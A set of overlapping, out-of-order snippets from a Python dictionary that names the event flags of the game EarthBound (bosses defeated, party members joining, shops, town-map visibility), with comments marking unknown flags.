'SHOW_FOURSIDE_HINT_TOWN_MAP', 685: 'SHOW_SUMMERS_HINT_TOWN_MAP', 686: 'SHOW_SCARABA_HINT_TOWN_MAP', 687: 'SCARABA_CULTURAL_MUSEUM_PHONE_RINGING', 688: 'HAS_CALLED_MOM',", "68: 'CARPAINTER_DEFEATED', 69: 'BOOGEY_TENT_DEFEATED', 70: 'STARMAN_DX_DEFEATED', 71: 'MASTER_BELCH_DEFEATED', 72: 'MINE_MOLES_DEFEATED', 73: 'GIYGAS_DEFEATED', 74:", "273: 'MU_TRAINING_COMPLETE', 274: 'DUNGEON_MAN_AT_PALM_TREES', 275: 'LEARNED_TELEPORT', 276: 'MASTER_BARF_DEFEATED', 277: 'GUARDIAN_MOLE_1_DEFEATED', 278: 'GUARDIAN_MOLE_2_DEFEATED', 279:", "48: 'FIXED_SKYRUNNER_THREED', 49: 'BOOGEY_TENT_IN_THREED', 50: 'BRICK_ROAD_OUTSIDE_DUNGEON', 51: 'SHYNESS_BOOK_AT_LIBRARY', 52: 'CAPTIVES_AT_STONEHENGE', 53: 'TALKED_TO_BRICK_ROAD', #", "TODO: Maybe \"can search for shyness book\"? This flag is set even if", "'GOT_BACKSTAGE_PASS', 554: 'GOT_YOGURT_DISPENSER', 555: 'FOURSIDE_DEPT_LIGHTS_OUT', 556: 'FOURSIDE_DEPT_BLACKOUT_JUST_ENDED', 557: 'READY_TO_SAIL_TO_SCARABA', 558: 'HIDE_ONETT_DRUGSTORE_TOWN_MAP', 559: 'HIDE_ONETT_BURGER_SHOP_TOWN_MAP',", "5: 'TEMP_5', 6: 'TEMP_6', 7: 'TEMP_7', 8: 'TEMP_8', 9: 'TEMP_9', 10: 'TEMP_10', 11:", "'ZOMBIE_CHICK_AT_HOTEL_2', # Second hotel room 298: 'ZOMBIE_CHICK_AT_HOTEL_3', # Third hotel room 299: 'IRON_ERASER_ERASED',", "'PAULAS_DAD_RAN_IN_FRONT_OF_TWOSON_HOTEL', 740: 'PEOPLE_IN_THREED_ABSENT', 741: 'MONOTOLI_AT_48TH_FLOOR', 742: 'LARDNA_AT_HOME', 743: 'VISITED_HAPPY_HAPPY_VILLAGE', 744: 'TALKED_TO_CARPAINTER', 745: 'QUEST_TO_YOGURT_MACHINE',", "Everdred) 612: 'EVERDRED_NOT_AT_ROOF', 613: 'TELEPORT_MONKEY_NOT_AT_CAVE', 614: 'TELEPORT_MONKEY_NEAR_MONKEY_CAVE_ENTRANCE', 615: 'TELEPORT_MONKEY_NEAR_DESERT_ROAD', 616: 'TENDAKRAUT_STOLEN', 617: 'MAGIC_CAKE_LADY_AT_BEACH',", "'HEALER_SOFTEN', 177: 'HEALER_PURIFY', 178: 'HEALER_RESTORE_FEELING', 179: 'LARGE_PIZZA_DELIVERY', 180: 'PIZZA_DELIVERY', 181: 'ESCARGO_EXPRESS_DELIVERY', 182: 'GOT_MELODY_GIANT_STEP',", "173: 'GOT_SATURN_STAG_BEETLE', 174: 'DESERT_MINE_EXPANDED', # 175 (Unknown. Set when you receive the Pencil", "646: 'FOR_SALE_SIGN_CUSTOMER_2', 647: 'FOR_SALE_SIGN_CUSTOMER_3', 648: 'FOR_SALE_SIGN_CUSTOMER_4', 649: 'TALKED_TO_ROCK_BELOW_TENDA_VILALGE', 650: 'GOT_MONKEYS_LOVE', 651: 'UNDERWORLD_TENDA_GATE_OPEN', 652:", "'DUNGEON_MAN_DESERT_MUSIC', 663: 'RETURNED_SHYNESS_BOOK', 664: 'TREMBLING_MONOTOLI_AT_48TH_FLOOR_ABSENT', 665: 'GOT_LETTER_FROM_MOM', 666: 'GOT_LETTER_FROM_TONY', 667: 'GOT_LETTER_FROM_KIDS', 668: 'TALKED_TO_MONTAGUE_AT_SATURN_VALLEY_BEFORE_MAGICANT',", "in unused text 104: 'POKEY_PUNISHED', 105: 'PATH_TO_TWOSON_OPEN', # 106 (???) 107: 'ONETT_SUNRISE', 108:", "'LARDNA_AT_HOME', 743: 'VISITED_HAPPY_HAPPY_VILLAGE', 744: 'TALKED_TO_CARPAINTER', 745: 'QUEST_TO_YOGURT_MACHINE', 746: 'SCAM_HOUSE_UNLOCKED', # 747 (??? Something", "'FLYING_MAN_1_DEAD', 205: 'FLYING_MAN_2_DEAD', 206: 'FLYING_MAN_3_DEAD', 207: 'FLYING_MAN_4_DEAD', 208: 'FLYING_MAN_5_DEAD', 209: 'VISITED_ONETT', 210: 'VISITED_TWOSON',", "264: 'SHOP_FOURSIDE_PUNK_GUY', 265: 'SHOP_SUMMERS_SHOP', 266: 'SHOP_SUMMERS_RESTAURANT', 267: 'SHOP_TOTO_SHOP', 268: 'SHOP_SUMMERS_GELATO', 269: 'SHOP_MAGIC_CAKE_LADY', 270:", "391: 'GUARDIAN_HIEROGLYPH_2_DEFEATED', # The second Hieroglyph Guardian doesn't reference this flag and never", "'GOT_BAD_KEY_MACHINE', 89: 'GOT_SHYNESS_BOOK', 90: 'GOT_DIAMOND', 91: 'GOT_SIGNED_BANANA', 92: 'GOT_TENDA_DRAGONITE', 93: 'GOT_MAGICANT_BASEBALL_CAP', 94: 'MOM_ADVICE_TO_TAKE_CRACKED_BAT',", "receive the Pencil Eraser. Cleared when you defeat Mr. Carpainter) 176: 'HEALER_SOFTEN', 177:", "'PAULA_TELEPATHY_DREAM_JEFF', 637: 'POO_AT_HIS_PALACE', 638: 'PAULA_AT_HER_ROOM', 639: 'TALKED_TO_MAGICANT_EVERDRED', 640: 'HIDE_FOURSIDE_TO_DESERT_TOWN_MAP', 641: 'HIDE_THREED_TO_DESERT_TOWN_MAP', 642: 'HIDE_THREED_TO_TWOSON_TOWN_MAP',", "'ALT_NO_TALK_TEXT', 661: 'CHOSEN_FOUR_SOULS_RETURNING_MUSIC', 662: 'DUNGEON_MAN_DESERT_MUSIC', 663: 'RETURNED_SHYNESS_BOOK', 664: 'TREMBLING_MONOTOLI_AT_48TH_FLOOR_ABSENT', 665: 'GOT_LETTER_FROM_MOM', 666: 'GOT_LETTER_FROM_TONY',", "Something about the City Bus?) # 314 (Unknown. Something about the Runaway Five", "219: 'VISITED_TENDA_VILLAGE', 220: 'VISITED_UNDERWORLD', 221: 'UNUSED_BRAIN_FOOD_LUNCH', 222: 'UNUSED_REFRESHING_HERB', 223: 'GOT_PHASE_DISTORTER_HORN_OF_LIFE', 224: 'SHOP_SOLD_OLD_EQUIPMENT', 225:", "door knocking?) 468: 'POKEYS_HOUSE_LOCKED', 469: 'POLICE_AT_METEORITE', 470: 'TALKED_TO_TRACY_AT_HER_ROOM', 471: 'TALKED_TO_MOM', 472: 'TALKED_TO_POKEY_AT_METEORITE', 473:", "328: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_1', 329: 'APPLE_KID_AT_CAVE_OF_THE_PRESENT', 330: 'MR_SATURN_AT_CAVE_OF_THE_PRESENT', 331: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_2', 332: 'PHASE_DISTORTER_V2_AT_CAVE_OF_THE_PRESENT', 333: 'DESERT_MINE_BULLDOZER_MOVED', 334:", "71: 'MASTER_BELCH_DEFEATED', 72: 'MINE_MOLES_DEFEATED', 73: 'GIYGAS_DEFEATED', 74: 'NESS_NIGHTMARE_DEFEATED', 75: 'MANI_MANI_DEFEATED', 76: 'GOT_TRACY_COOKIE', 77:", "687: 'SCARABA_CULTURAL_MUSEUM_PHONE_RINGING', 688: 'HAS_CALLED_MOM', 689: 'HAS_CALLED_MOM_AFTER_RESCUING_PAULA', 690: 'PAULA_KIDNAPPED_WITH_PENCIL_ERASER', 691: 'POO_LEFT_WITH_HAWK_EYE', 692: 'ESCARGO_EXPRESS_HAS_PAULAS_PENCIL_ERASER', 693:", "0x0D70) in a radius of 16 pixels) 346: 'GAVE_RUBY_TO_HIEROGLYPHS_GUY', 347: 'PYRAMID_HOLE_OPEN', 348: 'GOT_HAWK_EYE',", "762: 'DUNGEON_MAN_GOODBYE_EXIT_SIGN', 763: 'PICKY_KNOCKING_ON_DOOR', 764: 'READY_TO_LEARN_TELEPORT', 765: 'LEARNED_PHASE_DISTORTER_V2_FUNCTIONS', 766: 'EXIT_MOUSE_DISAGREEABLE', 767: 'LEARNED_ABOUT_UNDERWORLD_GEYSERS', 768:", "590: 'HAPPY_THREED_PEOPLE', 591: 'CHARRED_MONKEY_OUTSIDE_JACKIES_CAFE', # TODO: CONFIRM 592: 'MONKEY_OUTSIDE_JACKIES_CAFE', # TODO: CONFIRM 593:", "'GHOSTS_BLOCKING_TWOSON', # 316 (Unknown. Something about the City Bus?) 317: 'RUNAWAY_BUS_FROM_FOURSIDE_TO_THREED', 318: 'RUNAWAY_FIVE_AT_CLUMSY_ROBOT_ROOM',", "(???) 541: 'OPENED_THREED_CEMETERY_UNDREGROUND_DOOR', 542: 'SAILING_OR_SUBMARINE_MUSIC', 543: 'SAILING_POST_KRAKEN_MUSIC', 544: 'WINTERS_MUSIC', 545: 'LAST_MELODY_AT_LILLIPUT_STEPS', 546: 'LAST_MELODY_AT_MILKY_WELL',", "# 110 (???) 111: 'VISITED_PEACEFUL_REST_PENCIL', 112: 'INVESTED_IN_APPLE_KID', 113: 'STUBBY_LEGS', 114: 'TWOSON_DEPT_MAN', 115: 'CHAOS_THEATER_BACKSTAGE_OPEN',", "634: 'PAULA_TELEPATHY_DREAM_1', 635: 'PAULA_TELEPATHY_DREAM_2', 636: 'PAULA_TELEPATHY_DREAM_JEFF', 637: 'POO_AT_HIS_PALACE', 638: 'PAULA_AT_HER_ROOM', 639: 'TALKED_TO_MAGICANT_EVERDRED', 640:", "'SAILING_OR_SUBMARINE_MUSIC', 543: 'SAILING_POST_KRAKEN_MUSIC', 544: 'WINTERS_MUSIC', 545: 'LAST_MELODY_AT_LILLIPUT_STEPS', 546: 'LAST_MELODY_AT_MILKY_WELL', 547: 'LAST_MELODY_AT_PINK_CLOUD', 548: 'LAST_MELODY_AT_FIRE_SPRING',", "'SHOP_HH_DRUGSTORE_CONSUMABLES', 240: 'SHOP_HH_DRUGSTORE_EQUIPMENT', 241: 'SHOP_THREED_DRUGSTORE_EQUIPMENT', 242: 'SHOP_THREED_DRUGSTORE_CONSUMABLES', 243: 'SHOP_THREED_ARMS_DEALER', 244: 'SHOP_THREED_BAKERY', 245: 'SHOP_WINTERS_DRUGSTORE',", "# 55 (Also related to Montague... AND STONEHENGE??) # 56 (Unknown) 57: 'FOURSIDE_DEPT_BLACKOUT',", "'CAN_ENTER_BELCHS_FACTORY', # 370 (Unknown. Related to traffic jam?) # 371 (???) 372: 'PARTY_IS_ROBOTIFIED',", "# 475 (Handles continue yes/no on death. TODO: Investigate) 476: 'POLICE_BARRIERS_AT_ONETT_HILLTOP', 477: 'NESS_SLEEPING_AT_HIS_BED',", "66: 'EVERDRED_DEFEATED', 67: 'FOOD_STAND_MONITOR_DEFEATED', 68: 'CARPAINTER_DEFEATED', 69: 'BOOGEY_TENT_DEFEATED', 70: 'STARMAN_DX_DEFEATED', 71: 'MASTER_BELCH_DEFEATED', 72:", "724: 'GOT_PHOTO_SCARABA_BAZAAR', 725: 'GOT_PHOTO_PYRAMID', 726: 'GOT_PHOTO_SCARABA_OASIS', 727: 'GOT_PHOTO_DEEP_DARKNESS', 728: 'GOT_PHOTO_TENDA_VILLAGE', 729: 'GOT_PHOTO_SATURN_VALLEY_FINAL', 730:", "449: 'CAPTAIN_STRONG_AT_STATION_ENTRANCE', 450: 'CAPTAIN_STRONG_NOT_AT_STATION_DESK', 451: 'MONKEY_CAVE_SKIP_SANDWICH', 452: 'MONKEY_CAVE_PICNIC_LUNCH', 453: 'MONKEY_CAVE_WET_TOWEL', 454: 'MONKEY_CAVE_PIZZA_1', 455:", "213: 'VISITED_SATURN_VALLEY', 214: 'VISITED_FOURSIDE', 215: 'VISITED_SUMMERS', 216: 'VISITED_DALAAM', 217: 'VISITED_SCARABA', 218: 'VISITED_DEEP_DARKNESS', 219:", "'PAULAS_DAD_NOTICED_SHES_NOT_HOME', 323: 'GOT_PAK_OF_BUBBLE_GUM', 324: 'SHOP_RED_SNAKE', 325: 'SHOP_SCARABA_BAZAAR_EQUIPMENT', 326: 'SHOP_SCARABA_HOTEL_ARMS_DEALER', 327: 'PHASE_DISTORTER_V3_AT_CAVE_OF_THE_PRESENT', 328: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_1',", "8: 'TEMP_8', 9: 'TEMP_9', 10: 'TEMP_10', 11: 'ENEMY_SUPPRESS', 12: 'PAULAS_PARENTS_KNOW_ABOUT_HH_RESCUE', 13: 'PAULA_JOINS', 14:", "'HAS_CALLED_MOM', 689: 'HAS_CALLED_MOM_AFTER_RESCUING_PAULA', 690: 'PAULA_KIDNAPPED_WITH_PENCIL_ERASER', 691: 'POO_LEFT_WITH_HAWK_EYE', 692: 'ESCARGO_EXPRESS_HAS_PAULAS_PENCIL_ERASER', 693: 'ESCARGO_EXPRESS_HAS_POOS_HAWK_EYE', 694: 'ESCARGO_EXPRESS_PENCIL_ERASER_DELIVERY',", "'TENDAKRAUT_STOLEN', 617: 'MAGIC_CAKE_LADY_AT_BEACH', 618: 'GOT_ERASER_ERASER', # 619 (Unkonwn. Related to Stonehenge Base) 620:", "'CONQUERED_SANCTUARY_4', 193: 'CONQUERED_SANCTUARY_3', 194: 'CONQUERED_SANCTUARY_5', 195: 'CONQUERED_SANCTUARY_6', 196: 'CONQUERED_SANCTUARY_7', 197: 'CONQUERED_SANCTUARY_8', # 198", "'TENDA_VILLAGE_UNDERGROUND_OPEN', 154: 'TALKED_TO_TENDA_CHIEF', 155: 'TENDAS_NOT_SHY', # 156 (???) # 157 (???) # 158", "'PAULA_TELEPATHY_DREAM_2', 636: 'PAULA_TELEPATHY_DREAM_JEFF', 637: 'POO_AT_HIS_PALACE', 638: 'PAULA_AT_HER_ROOM', 639: 'TALKED_TO_MAGICANT_EVERDRED', 640: 'HIDE_FOURSIDE_TO_DESERT_TOWN_MAP', 641: 'HIDE_THREED_TO_DESERT_TOWN_MAP',", "to Paula's dad and not talking to Everdred) 612: 'EVERDRED_NOT_AT_ROOF', 613: 'TELEPORT_MONKEY_NOT_AT_CAVE', 614:", "568: 'HIDE_TWOSON_HOSPITAL_TOWN_MAP', 569: 'HIDE_TWOSON_TO_THREED_TOWN_MAP', 570: 'HIDE_THREED_DRUGSTORE_TOWN_MAP', 571: 'HIDE_THREED_HOTEL_TOWN_MAP', # 572 (???) 573: 'HIDE_THREED_BAKERY_TOWN_MAP',", "313 (Unknown. Something about the City Bus?) # 314 (Unknown. Something about the", "'ONETT_COP_4_DEFEATED', 293: 'ONETT_COP_5_DEFEATED', 294: 'APPLE_MOUSE_BLOCKING_DOOR', 295: 'NESS_HOUSE_DOOR_KNOCKING', 296: 'ZOMBIE_CHICK_AT_HOTEL_1', # First hotel room", "'BRICK_ROAD_OUTSIDE_DUNGEON', 51: 'SHYNESS_BOOK_AT_LIBRARY', 52: 'CAPTIVES_AT_STONEHENGE', 53: 'TALKED_TO_BRICK_ROAD', # 54 (Montague at beginning of", "289: 'ONETT_COP_1_DEFEATED', 290: 'ONETT_COP_2_DEFEATED', 291: 'ONETT_COP_3_DEFEATED', 292: 'ONETT_COP_4_DEFEATED', 293: 'ONETT_COP_5_DEFEATED', 294: 'APPLE_MOUSE_BLOCKING_DOOR', 295:", "'GOT_SUPORMA', 551: 'GAVE_FOOD_TO_APPLE_KID', 552: 'GOT_ZOMBIE_PAPER', 553: 'GOT_BACKSTAGE_PASS', 554: 'GOT_YOGURT_DISPENSER', 555: 'FOURSIDE_DEPT_LIGHTS_OUT', 556: 'FOURSIDE_DEPT_BLACKOUT_JUST_ENDED',", "534: 'CITY_BUS_MUSIC', 535: 'RUNAWAY_BUS_OR_SKY_RUNNER_FALLING_MUSIC', 536: 'RUNAWAY_FIVE_FREE_MUSIC', 537: 'TESSIE_MUSIC', # 538 (???) 539: 'GIVEN_PLAYERS_NAME',", "flag for NPCs #851 and #852 760: 'PHASE_DISTORTER_MUSIC', # 761 (Unknown. Set when", "if you're near (0x02A0, 0x0D70) in a radius of 16 pixels) 346: 'GAVE_RUBY_TO_HIEROGLYPHS_GUY',", "(???) 539: 'GIVEN_PLAYERS_NAME', # 540 (???) 541: 'OPENED_THREED_CEMETERY_UNDREGROUND_DOOR', 542: 'SAILING_OR_SUBMARINE_MUSIC', 543: 'SAILING_POST_KRAKEN_MUSIC', 544:", "727: 'GOT_PHOTO_DEEP_DARKNESS', 728: 'GOT_PHOTO_TENDA_VILLAGE', 729: 'GOT_PHOTO_SATURN_VALLEY_FINAL', 730: 'TALKED_TO_ONETT_BAKERY_LADY_TWICE', 731: 'SHOP_UNDERWORLD_TENDA', 732: 'SHOP_MAGICANT', 733:", "361: 'SENTRY_ROBOT_5_DEFEATED', 362: 'SENTRY_ROBOT_6_DEFEATED', 363: 'SHARK_OUTSIDE_ARCADE_1_DEFEATED', 364: 'SHARK_OUTSIDE_ARCADE_2_DEFEATED', 365: 'SHARK_AT_ARCADE_ABSENT', 366: 'SLIMY_LITTLE_PILE_1_DEFEATED_AND_THREED_BLOND_GUY_BY_TENT_ABSENT', 367:", "'KIDNAPPED_MR_SATURN_AT_CAVE_OF_THE_PRESENT', 383: 'JUST_RESTED', 384: 'GOT_ALL_MELODIES', 385: 'GOT_CONTACT_LENS', 386: 'MOONSIDE_ENRAGED_FIRE_PLUG_DEFEATED', # Unused, there's no", "'DUNGEON_MAN_IN_DESERT', 63: 'PATH_TO_MANI_MANI_OPEN', 64: 'FRANKYSTEIN_MKII_DEFEATED', # 65 (???) 66: 'EVERDRED_DEFEATED', 67: 'FOOD_STAND_MONITOR_DEFEATED', 68:", "672: 'POKEY_FLIES_AWAY_BY_HELICOPTER', 673: 'HIDE_TWOSON_BURGLIN_BAKERY_TOWN_MAP', 674: 'HIDE_SCARABA_FOOD_TOWN_MAP', 675: 'MACH_PIZZA_ZOMBIE_PAPER_DELIVERY', 676: 'HIDE_THREED_BUS_STOP_1_TOWN_MAP', 677: 'HIDE_THREED_BUS_STOP_2_TOWN_MAP', 678:", "190: 'CONQUERED_SANCTUARY_1', 191: 'CONQUERED_SANCTUARY_2', 192: 'CONQUERED_SANCTUARY_4', 193: 'CONQUERED_SANCTUARY_3', 194: 'CONQUERED_SANCTUARY_5', 195: 'CONQUERED_SANCTUARY_6', 196:", "605: 'USED_KEY_TO_THE_LOCKER', 606: 'DUNGEON_MAN_OPEN', # 607 (Unknown. Related to desert mine?) 608: 'DESERT_MINE_TO_EXPAND_NEXT_NIGHT',", "209: 'VISITED_ONETT', 210: 'VISITED_TWOSON', 211: 'VISITED_THREED', 212: 'VISITED_WINTERS', 213: 'VISITED_SATURN_VALLEY', 214: 'VISITED_FOURSIDE', 215:", "and never fights you 391: 'GUARDIAN_HIEROGLYPH_2_DEFEATED', # The second Hieroglyph Guardian doesn't reference", "603: 'MINI_BARF_DEFEATED', 604: 'GOT_KEY_TO_THE_LOCKER', 605: 'USED_KEY_TO_THE_LOCKER', 606: 'DUNGEON_MAN_OPEN', # 607 (Unknown. Related to", "212: 'VISITED_WINTERS', 213: 'VISITED_SATURN_VALLEY', 214: 'VISITED_FOURSIDE', 215: 'VISITED_SUMMERS', 216: 'VISITED_DALAAM', 217: 'VISITED_SCARABA', 218:", "'SHOP_THREED_BAKERY', 245: 'SHOP_WINTERS_DRUGSTORE', 246: 'SHOP_LAB_CAVE_BOY', 247: 'SHOP_GRAPEFRUIT_FALLS', 248: 'SHOP_SATURN_EQUIPMENT', 249: 'SHOP_SATURN_PENDANTS', 250: 'SHOP_SATURN_CONSUMABLES',", "'HIDE_SUMMERS_SHOP_TOWN_MAP', 585: 'HIDE_SUMMERS_HOSPITAL_TOWN_MAP', 586: 'HIDE_TOTO_SHOP_TOWN_MAP', 587: 'FLYING_MAN_MUSIC', # 588 (Visibility flag for someone", "382: 'KIDNAPPED_MR_SATURN_AT_CAVE_OF_THE_PRESENT', 383: 'JUST_RESTED', 384: 'GOT_ALL_MELODIES', 385: 'GOT_CONTACT_LENS', 386: 'MOONSIDE_ENRAGED_FIRE_PLUG_DEFEATED', # Unused, there's", "(???) 159: 'CHECKED_LAST_FLYING_MAN_TOMBSTONE', # 160 (???) # 161 (???) # 162 (???) #", "'GOT_DAD_PHONE', 200: 'GOT_MOM_PHONE', 201: 'GOT_ESCARGO_EXPRESS_PHONE', 202: 'GOT_MACH_PIZZA_PHONE', 203: 'GOT_STOIC_CLUB_PHONE', 204: 'FLYING_MAN_1_DEAD', 205: 'FLYING_MAN_2_DEAD',", "522 (Multipurpose?) # 523 (Multipurpose?) 524: 'YOUR_SANCTUARY_MUSIC', # 525 (???) 526: 'NEAR_BLUE_GEYSER_1', 527:", "283 (???) 284: 'PEACEFUL_REST_PENCIL_ERASED', 285: 'TALKED_TO_APPLE_KID_CAVE_OF_THE_PRESENT', # 286 (???) # 287 (Something about", "455: 'MONKEY_CAVE_PROTEIN_DRINK', 456: 'MONKEY_CAVE_PIZZA_2', 457: 'MONKEY_CAVE_HAMBURGER_1', 458: 'MONKEY_CAVE_HAMBURGER_2', 459: 'MONKEY_CAVE_KING_BANANA', 460: 'MONKEY_CAVE_HAMBURGER_3', 461:", "when you receive the Pencil Eraser. Cleared when you defeat Mr. Carpainter) 176:", "637: 'POO_AT_HIS_PALACE', 638: 'PAULA_AT_HER_ROOM', 639: 'TALKED_TO_MAGICANT_EVERDRED', 640: 'HIDE_FOURSIDE_TO_DESERT_TOWN_MAP', 641: 'HIDE_THREED_TO_DESERT_TOWN_MAP', 642: 'HIDE_THREED_TO_TWOSON_TOWN_MAP', 643:", "171: 'GOT_SATURN_LIFENOODLES', 172: 'GOT_SATURN_COIN', 173: 'GOT_SATURN_STAG_BEETLE', 174: 'DESERT_MINE_EXPANDED', # 175 (Unknown. Set when", "162 (???) # 163 (???) # 164 (???) 165: 'INVISIBLE_MAN_JOINS', 166: 'MOONSIDE_COUNTDOWN_GUY_1', 167:", "319: 'WATCHED_RUNAWAY_FIVE_AT_CHAOS_THEATER', # 320 (???) # 321 (Something about Paula's Dad acknowledging the", "'GOT_MAGIC_TRUFFLE_4', 443: 'GOT_MAGIC_TRUFFLE_5', 444: 'KING_JOINS', 445: 'TALKED_TO_BRICK_ROADS_HEAD', 446: 'FOR_SALE_SIGN_CUSTOMER_1', # 447 (???) #", "set if you're near (0x02A0, 0x0D70) in a radius of 16 pixels) 346:", "366: 'SLIMY_LITTLE_PILE_1_DEFEATED_AND_THREED_BLOND_GUY_BY_TENT_ABSENT', 367: 'SLIMY_LITTLE_PILE_2_DEFEATED', 368: 'SLIMY_LITTLE_PILE_3_DEFEATED', 369: 'CAN_ENTER_BELCHS_FACTORY', # 370 (Unknown. Related to", "446: 'FOR_SALE_SIGN_CUSTOMER_1', # 447 (???) # 448 (???) 449: 'CAPTAIN_STRONG_AT_STATION_ENTRANCE', 450: 'CAPTAIN_STRONG_NOT_AT_STATION_DESK', 451:", "109: 'ONETT_COP_DIALOGUE', # 110 (???) 111: 'VISITED_PEACEFUL_REST_PENCIL', 112: 'INVESTED_IN_APPLE_KID', 113: 'STUBBY_LEGS', 114: 'TWOSON_DEPT_MAN',", "'SHOW_SCARABA_HINT_TOWN_MAP', 687: 'SCARABA_CULTURAL_MUSEUM_PHONE_RINGING', 688: 'HAS_CALLED_MOM', 689: 'HAS_CALLED_MOM_AFTER_RESCUING_PAULA', 690: 'PAULA_KIDNAPPED_WITH_PENCIL_ERASER', 691: 'POO_LEFT_WITH_HAWK_EYE', 692: 'ESCARGO_EXPRESS_HAS_PAULAS_PENCIL_ERASER',", "'GOT_PHOTO_BRICK_ROAD_DUNGEON', 706: 'GOT_PHOTO_THREED_CEMETERY', 707: 'GOT_PHOTO_GRAPEFRUIT_FALLS', 708: 'GOT_PHOTO_SATURN_VALLEY_COFFEE', 709: 'GOT_PHOTO_CIRCUS_TENT', 710: 'GOT_PHOTO_BLACK_SESAME_SEED', 711: 'GOT_PHOTO_DESERT_MINE',", "'ANSWERED_DADS_CALL', 99: 'BOUGHT_SCAM_HOUSE', 100: 'KING_WONT_JOIN', 101: 'LEARNED_THAT_LIER_SOLD_THE_MANI_MANI', 102: 'TALKED_TO_SHYGUY_ABOUT_SHYNESS_BOOK', 103: 'LIBRARY_BATHROOM_MAN', # Referenced", "'MOONSIDE_MUSEUM_ROBO_PUMP_DEFEATED', 389: 'MOONSIDE_HOSPITAL_ABSTRACT_ART_DEFEATED', 390: 'GUARDIAN_HIEROGLYPH_1_DEFEATED', # The first Hieroglyph Guardian doesn't reference this", "480: 'PHOTO_SCAM_HOUSE_AVAILABLE', 481: 'PHOTO_CYCLE_SHOP_AVAILABLE', 482: 'PHOTO_PEACEFUL_REST_VALLEY_AVAILABLE', 483: 'PHOTO_HAPPY_HAPPY_CABIN_AVAILABLE', 484: 'PHOTO_CHAOS_THEATER_AVAILABLE', 485: 'PHOTO_LAKE_TESS_AVAILABLE', 486:", "'SENTRY_ROBOT_1_DEFEATED', 358: 'SENTRY_ROBOT_2_DEFEATED', 359: 'SENTRY_ROBOT_3_DEFEATED', 360: 'SENTRY_ROBOT_4_DEFEATED', 361: 'SENTRY_ROBOT_5_DEFEATED', 362: 'SENTRY_ROBOT_6_DEFEATED', 363: 'SHARK_OUTSIDE_ARCADE_1_DEFEATED',", "374: 'TOPOLLA_THEATER_BACKSTAGE_UNBLOCKED', 375: 'PEOPLE_IN_ONETT', # 376 (Unknown. Set after Apple Kid calls you", "552: 'GOT_ZOMBIE_PAPER', 553: 'GOT_BACKSTAGE_PASS', 554: 'GOT_YOGURT_DISPENSER', 555: 'FOURSIDE_DEPT_LIGHTS_OUT', 556: 'FOURSIDE_DEPT_BLACKOUT_JUST_ENDED', 557: 'READY_TO_SAIL_TO_SCARABA', 558:", "'ZOMBIE_CHICK_AT_HOTEL_1', # First hotel room 297: 'ZOMBIE_CHICK_AT_HOTEL_2', # Second hotel room 298: 'ZOMBIE_CHICK_AT_HOTEL_3',", "139: 'DEPT_STORE_SPOOK_DEFEATED', # TODO: Confirm 140: 'QUEST_TO_VENUS_AUTOGRAPH', 141: 'GOT_TROUT_YOGURT', 142: 'CAN_ACCESS_48TH_MONOTILI_FLOOR', 143: 'FOURSIDE_FREE_FROM_MONOTOLI',", "151: 'QUEST_TO_SUBMARINE', 152: 'PYRAMID_DANCE_IN_PROGRESS', 153: 'TENDA_VILLAGE_UNDERGROUND_OPEN', 154: 'TALKED_TO_TENDA_CHIEF', 155: 'TENDAS_NOT_SHY', # 156 (???)", "(Unknown. Related to Ness's house door knocking?) 468: 'POKEYS_HOUSE_LOCKED', 469: 'POLICE_AT_METEORITE', 470: 'TALKED_TO_TRACY_AT_HER_ROOM',", "414: 'LETHAL_ASP_HIEROGLYPH_8_DEFEATED', 415: 'LETHAL_ASP_HIEROGLYPH_9_DEFEATED', 416: 'BRICK_ROAD_DUNGEON_DUCK_1_DEFEATED', 417: 'BRICK_ROAD_DUNGEON_DUCK_2_DEFEATED', 418: 'BRICK_ROAD_DUNGEON_PROTOPLASM_1_DEFEATED', 419: 'BRICK_ROAD_DUNGEON_PROTOPLASM_2_DEFEATED', 420:", "419: 'BRICK_ROAD_DUNGEON_PROTOPLASM_2_DEFEATED', 420: 'BRICK_ROAD_DUNGEON_MOUSE_1_DEFEATED', 421: 'BRICK_ROAD_DUNGEON_MOUSE_2_DEFEATED', 422: 'ONETT_DAYTIME', 423: 'UNDERWORLD_TALKING_ROCK_STOPPED_TALKING', 424: 'TENDA_SHOP_PLAIN_ROLL_1', 425:", "770: 'LAST_ESCARGO_EXPRESS_CALL', # 771 (???) 772: 'LAST_DAD_CALL', 773: 'NERDY_GUY_AND_FAT_GUY_AT_CIRCUS_TENT', # Visibility flags for", "(???) 772: 'LAST_DAD_CALL', 773: 'NERDY_GUY_AND_FAT_GUY_AT_CIRCUS_TENT', # Visibility flags for NPCs #457 and #459", "12: 'PAULAS_PARENTS_KNOW_ABOUT_HH_RESCUE', 13: 'PAULA_JOINS', 14: 'JEFF_JOINS', 15: 'MONSTERS_IN_WINTERS', 16: 'POO_JOINS', 17: 'POO_LEARNING_STARSTORM', 18:", "93: 'GOT_MAGICANT_BASEBALL_CAP', 94: 'MOM_ADVICE_TO_TAKE_CRACKED_BAT', 95: 'DAD_CALLING_HOME', 96: 'POKEY_WAITING_MOM_GOODBYE', 97: 'NESS_HOUSE_POKEY_MUSIC', 98: 'ANSWERED_DADS_CALL', 99:", "114: 'TWOSON_DEPT_MAN', 115: 'CHAOS_THEATER_BACKSTAGE_OPEN', 116: 'ORANGE_KID_ALT_TEXT', 117: 'INVESTED_IN_ORANGE_KID', 118: 'PAULAS_DAD_OUTSIDE', 119: 'RUNAWAY_FIVE_FREE_FROM_CHAOS_THEATER', 120:", "'MASTER_BELCH_DEFEATED', 72: 'MINE_MOLES_DEFEATED', 73: 'GIYGAS_DEFEATED', 74: 'NESS_NIGHTMARE_DEFEATED', 75: 'MANI_MANI_DEFEATED', 76: 'GOT_TRACY_COOKIE', 77: 'GOT_MR_BASEBALL_CAP',", "(I hate multipurpose flags) # 228 (I hate multipurpose flags) # 229 (I", "'GOING_TO_MAGICANT_MUSIC', 759: 'VENUS_AND_RUNAWAY_FANS_AT_TOPOLLA', # Visibility flag for NPCs #851 and #852 760: 'PHASE_DISTORTER_MUSIC',", "(Unkonwn. Related to Stonehenge Base) 620: 'APPLE_MOUSE_AT_WINTERS_LAB', 621: 'MONKEYS_AT_WINTERS_LAB', 622: 'BUBBLE_MONKEYS_WIFE_AT_WINTERS', 623: 'PUNK_GUY_OUTSIDE_HIS_HOUSE_THREED',", "'GUARDIAN_MOLE_TEXT_3', 521: 'GUARDIAN_MOLE_TEXT_4', # 522 (Multipurpose?) # 523 